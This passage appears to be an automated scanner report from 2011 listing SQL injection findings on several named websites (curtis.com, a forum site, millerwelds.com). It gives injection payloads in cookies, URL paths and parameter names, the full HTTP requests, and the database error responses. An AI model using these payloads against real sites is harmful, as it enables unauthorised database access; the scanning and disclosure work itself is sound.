<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...
1.36. http://www.curtis.com/sitecontent.cfm [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 70094951%20or%201%3d1--%20 and 70094951%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d1--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d2--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...
1.37. http://www.curtis.com/sitecontent.cfm [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 15928176'%20or%201%3d1--%20 and 15928176'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...
1.38. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10251358'%20or%201%3d1--%20 and 10251358'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:39 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...
1.39. http://www.longislanderotic.com/forum [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.longislanderotic.com
Path:   /forum

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /forum?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.longislanderotic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 18:13:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: WWF=SID=b88fzzeb72437c112fee69314ce4df5f; path=/longislanderotic
Set-Cookie: ASPSESSIONIDQSCDACTQ=MNMDDPPBOGEADHEAEFIHMPPH; path=/
Cache-control: private

<br /><strong>Server Error in Forum Application</strong><br />An error has occured while writing to the database.<br />Please contact the forum administrator.<br /><br /><strong>Support Error Code:-</
...[SNIP]...
<br />Microsoft OLE DB Provider for SQL Server<br />
...[SNIP]...
1.40. http://www.millerwelds.com/about/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:38 GMT
Connection: Keep-Alive
Content-Length: 27686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.41. http://www.millerwelds.com/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:58 GMT
Connection: Keep-Alive
Content-Length: 20770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.3.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:59 GMT
Connection: Keep-Alive
Content-Length: 22492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=is
...[SNIP]...
1.42. http://www.millerwelds.com/about/certifications.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about'/certifications.html HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:30 GMT
Connection: Keep-Alive
Content-Length: 27705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.43. http://www.millerwelds.com/about/certifications.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /about/certifications.html' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:32 GMT
Connection: Keep-Alive
Content-Length: 27732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/about/certifications.html''' at line 1)<br>
...[SNIP]...
1.44. http://www.millerwelds.com/about/certifications.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /about/certifications.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /about/certifications.html?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.4.10.1303147760

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:52 GMT
Connection: Keep-Alive
Content-Length: 14835

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /about/certifications.html?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
